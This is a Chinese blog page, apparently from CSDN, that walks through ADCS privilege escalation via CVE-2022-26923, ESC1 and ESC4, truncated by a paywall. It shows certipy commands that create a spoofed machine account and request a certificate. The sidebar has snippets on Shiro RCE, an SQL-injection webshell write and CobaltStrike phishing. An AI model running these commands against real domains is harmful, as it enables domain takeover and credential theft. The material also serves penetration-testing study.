ADCS ESC1+ESC4+CVE-2022–26923

已于 2023-06-28 10:20:33 修改
阅读量412 收藏
点赞数
分类专栏: 红蓝对抗-攻防安全 文章标签: 服务器 运维
于 2023-06-27 02:44:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38376348/article/details/131408155
版权
本文详细介绍了如何利用CVE-2022-26923漏洞创建特殊账户并请求证书,进而获取域控权限。通过两种方式,包括证书请求hash和RBCD,展示了如何利用拿到的证书进行权限提升。同时,讨论了ECS1和ESC4漏洞的利用条件、步骤以及相关环境配置,提供了漏洞扫描和利用的命令示例。
摘要由CSDN通过智能技术生成

目录

CVE-2022–26923

创建机器账户并指定dnsHostName为dc的域名

 用该机器账户向ADCS请求证书

拿到证书后获取域控权限的2种方式

方式1 使用证书请求hash

 dcsync

方式2  RBCD

bug

 ECS1

漏洞利用方式1

certipy

漏洞利用方式2

certify+Rubeus+mimikatz

ESC4

环境

漏洞利用 ​编辑

其他情况

CVE-2022–26923

创建机器账户并指定dnsHostName为dc的域名

certipy account create -u cert@hacktest.com -p Admin123456. -dc-ip 10.211.55.3  -user win -pass win@123456 -dns 'DC.hacktest.com'

 用该机器账户向ADCS请求证书

certipy req -u 'win$'@hacktest.com -p win@123456 -target 10.211.55.7 -dc-ip

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Adsatrtgo
关注
专栏目录
订阅专栏
深入分析CVE-2022-26923 ADCS权限提升漏洞
谢公子的博客
05-26 3115
目录 漏洞背景和描述 基础知识 ADCS服务搭建&LDAPS配置 PKI公钥基础设施 CA证书颁发机构 PKINIT Kerberos认证 证书模板 用户模板 计算机模板 证书注册 漏洞原理 用户模板 实验一 实验二 实验三 实验四 实验五 实验六 实验七 原理总结 计算机模板 实验一 实验二 实验三 实验四 实验五 原理总结 漏洞复现 定位证书服务器 域内 域外 创建机器用户 请求证书 认证获得域控hash 导出域内任意用户哈希
域渗透笔记-ADCS 域提权-ESC4
NoooEmotion的博客
02-06 954
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
终于有人把域渗透之ADCS证书攻击讲透了
weixin_65550121的博客
12-09 1752
PKI是一个术语,有些地方会采用中文的表述——公钥基本结构,用来实现证书的产生、管理、存储、分发和撤销等功能。我们可以把他理解成是一套解决方案,这套解决方案里面需要有证书颁发机构,有证书发布,证书撤掉等功能。
PetitPotam漏洞复现(ESC8)结合CVE-2019-1040
whojoe的博客
08-02 3395
PetitPotam漏洞复现环境搭建漏洞复现参考文章 环境搭建 主机 机器名 ip 用户 密码 版本 域控1 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 域控2 ad2.test.com 192.168.164.146 administrator Aa1234 win2012r2 域内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 kali
ADCS攻击系列【ESC1-8】详解
最新发布
内心不种满鲜花就会长满杂草
09-11 129
ADCS(Active Directory Certificate Services),是微软提供的一套证书服务解决方案,用于实现公钥基础结构(PKI)的功能,包括证书的产生、管理、存储、分发和撤销等。ADCS能够与现有的Active Directory Domain Services(ADDS)服务结合,用于加密文件系统、数字签名以及身份验证等多种安全应用场景。在ADCS中,证书颁发机构(CA)扮演着核心角色,负责接收证书申请、验证申请者信息、颁发证书以及管理证书的吊销等。
ADCS知识点全收录! 如何利用证书服务器对域控进行多角度攻击(上)
小司机的奥拓
07-26 468
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1285
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
面试总结-2023届安全面试题总汇
lza20001103的博客
09-16 6921
2023届安全面试题总汇 文章目录2023届安全面试题总汇前言0x01 秋招目录(随时更新)0x02 各大安全厂商面试题资料链接一个2023届毕业生在毕业前持续更新、收集的安全岗面试题及面试经验分享 前言 最近发现一个宝贵的面试文章,写了各个以分安全为业务的公司汇总,也是面试官经常会问到的问题,以及CTF经历也是面试官所看好的,大家平时要多多打打CTF和靶机实战呀,这样我们的实战能力才会所有提高。 0x01 秋招目录(随时更新) 有最新的公司校招信息可以随时发布,第一时间更新主要安全行业的公司,主要放不以安
【原创】Ichunqiu云境 —— Endless(无间计划) Writeup
WUfagg的博客
03-21 859
Author:小离-xiaoli。
无法与域“xxxx.com”的Active Directory域控制器(AD DC)连接 之DNS故障
热门推荐
问题很多的小明
10-12 2万+
域控机DC: win7加入域控报错,发现无法加入域环境,报错内容,“无法与域“xxxx.com”的Active Directory域控制器(AD DC)连接”: 排查问题,发现DNS解析存在问题 但是域控机上解析是没有问题的: 抓包,发现本地DNS请求地址为ipV6,ipV6优先级高于Ipv4 解决问题:修改虚拟机网卡配置 关闭Ipv6 返回虚拟机: 重启网卡: 解析通过: 可以加入域: ...
shiro RCE (反序列化漏洞
问题很多的小明
06-02 6062
shiro RCE 攻击 这篇讲1.2.4的反序列化漏洞在实战中的记录 1 POC python shiro_check_key.py https://xxx.xxx.xxx.xxx "my0njp.dnslog.cn" DNSlog收到请求(平台地址:http://www.dnslog.cn/) 2 EXP 这里的回显是基于spring框架的,其实可以直接用过监听JMPServer直接执行命令 java -jar ShirobootRce.jar https://xxx.xxx.x
nmap扫描导出xml并查看
问题很多的小明
08-03 4781
1 扫描设置 不挂代理nmap -p- -v -sV -Pn -iL ip.txt -oA output 挂代理如:proxychains则需要加参数-sT 2 修改xml文件查看 修改输出文件 将xml文件拖入 ie查看
使用sublime快速文本去重/去空格/去某字符后内容
问题很多的小明
08-11 4560
使用Oneforall搜集子域名后,有很多重复的域名,这里不用写脚本去重,通过sublime正则快速去重 搜索替换,点击正则部分,正则为: (^.*\n)(?=\1) 统一将重复部分替换为空:
内网渗透之frp隧道搭建
问题很多的小明
05-29 3922
内网渗透之frp搭建隧道 内网穿透工具frp 1 文件下载地址: https://github.com/fatedier/frp/releases 版本和操作系统对应关系 2 搭建socks5代理 配置文件如下: 服务端:./frps -c frps.ini frps.ini [common] bind_addr = 0.0.0.0 #绑定的ip,为本机 bind_port = 17000 #绑定的端口 dashboard_addr = 0.0....
Go编译exe程序指定图标
问题很多的小明
08-31 3787
0x01 下载依赖 go get github.com/akavel/rsrc 下载后在项目工程目录可见: 0x02 制作图标 在线ico图标生成,生成后放到要编译的go的文件同目录下 0x03 生成相关文件编译 创建manifest文件, 命名:xxxx.exe.manifest <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microso
mssql 获取网站绝对路径写shell
问题很多的小明
08-13 3217
1 存在sql注入 创建表 GET /get.asp?act_id=52;create+table+gogotest+(tmp+varchar(1000));----&user_name=123 HTTP/1.1 Host: 360gongfang.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel M
win11 defender关闭以及恢复
问题很多的小明
11-07 3109
在工作的时候需要关闭def下可以参考
使用CobaltStrike制作钓鱼网站
问题很多的小明
08-13 3033
0x01 寻找网站模板 找有登录框的或者你想克隆的网站 0x02 CS克隆网站,并开启输入监听 填写克隆地址,勾选键盘监听 下一步填写VPS公网地址: 然后点击site按钮后,可以查看到钓鱼的服务端口以及状态 0x03访问测试 访问vps的ip以及对应端口 输入测试 查看web日志 看到用户输入账号密码 ...
Windows域环境漏洞CVE-2022-26923:权限提升与防范策略
漏洞 CVE-2022-26923特别针对安装了Active Directory Certificate Services (ADCS) 的服务器,使得低权限用户能通过特定条件提升至域管理员权限。影响范围广泛,涉及多个Windows版本,包括Windows 8.1、Windows 10...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值